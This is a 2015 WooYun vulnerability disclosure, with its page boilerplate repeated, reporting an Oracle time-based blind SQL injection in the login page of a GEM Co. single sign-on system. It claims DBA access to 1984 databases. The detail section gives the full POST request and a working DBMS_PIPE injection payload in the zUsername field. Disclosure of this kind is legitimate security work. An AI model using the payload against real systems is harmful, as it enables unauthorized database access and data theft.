格林美某重要系统存在root权限注入涉及1984个库

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137595

漏洞标题：格林美某重要系统存在root权限注入涉及1984个库

漏洞作者：路人甲

提交时间：2015-09-01 00:13

修复时间：2015-10-18 16:54

公开时间：2015-10-18 16:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-01：细节已通知厂商并且等待厂商处理中
2015-09-03： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-09-13：细节向核心白帽子及相关领域专家公开
2015-09-23：细节向普通白帽子公开
2015-10-03：细节向实习白帽子公开
2015-10-18：细节向公众公开

简要描述：

格林美股份有限公司于2001年12月28日在深圳注册成立，2010年1月登陆深圳证券交易所中小企业板，股票代码002340，是中国开采城市矿山资源第一支股票、再生资源行业和电子废弃物回收利用行业的第一支股票，总股本12亿股，净资产近43亿元，在册员工5000余人。

详细说明：

漏洞地址：

POST /SSOSERVICE/Login.aspx?rwPath=http%3a%2f%**.**.**.**%3a3333%2fGEMOA%2fdefault.aspx HTTP/1.1
Host: **.**.**.**:3333
Proxy-Connection: keep-alive
Content-Length: 287
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**:3333
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**:3333/SSOSERVICE/Login.aspx?rwPath=http%3a%2f%**.**.**.**%3a3333%2fGEMOA%2fdefault.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=gx5rpv45jorisg2qxrlvdiq4
__VIEWSTATE=%2FwEPDwULLTE3Njc1OTM3MDBkZL73BPGpPK0fWg%2BRmYx0g4V2flqj&__EVENTVALIDATION=%2FwEWBgKf5JrRCwLx6e6fBgLEtrLGDALB1tSdDwL01bijCwKkxcXLDUwhReplV5CO5rRPmcWeD%2Buy2%2BpP&btnActive=Login&zSystem=&zUsername=admin&TxtPassWD=admin&errMessage=%E7%94%A8%E6%88%B7%E6%9C%AA%E6%89%BE%E5%88%B0

zUsername存在oracle时间盲注

---
Parameter: zUsername (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: __VIEWSTATE=/wEPDwULLTE3Njc1OTM3MDBkZL73BPGpPK0fWg+RmYx0g4V2flqj&__EVENTVALIDATION=/wEW
BgKf5JrRCwLx6e6fBgLEtrLGDALB1tSdDwL01bijCwKkxcXLDUwhReplV5CO5rRPmcWeD+uy2+pP&btnActive=Login&zSystem
=&zUsername=admin' AND 6682=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(118)||CHR(68)||CHR(87),5) AND 'g
yQT'='gyQT&TxtPassWD=admin&errMessage=%E7%94%A8%E6%88%B7%E6%9C%AA%E6%89%BE%E5%88%B0
---

漏洞证明：

数据库太多，时间注入太慢，未一一列举出来，证明漏洞存在即可，1984个库

2、DBA权限

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-09-03 16:53

厂商回复：

暂未建立与网站管理单位的直接处置渠道,待认领.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137595

漏洞标题：格林美某重要系统存在root权限注入涉及1984个库

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-09-01 00:13

修复时间：2015-10-18 16:54

公开时间：2015-10-18 16:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0137595

漏洞标题：格林美某重要系统存在root权限注入涉及1984个库

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-09-01 00:13

修复时间：2015-10-18 16:54

公开时间：2015-10-18 16:54

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0137595"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云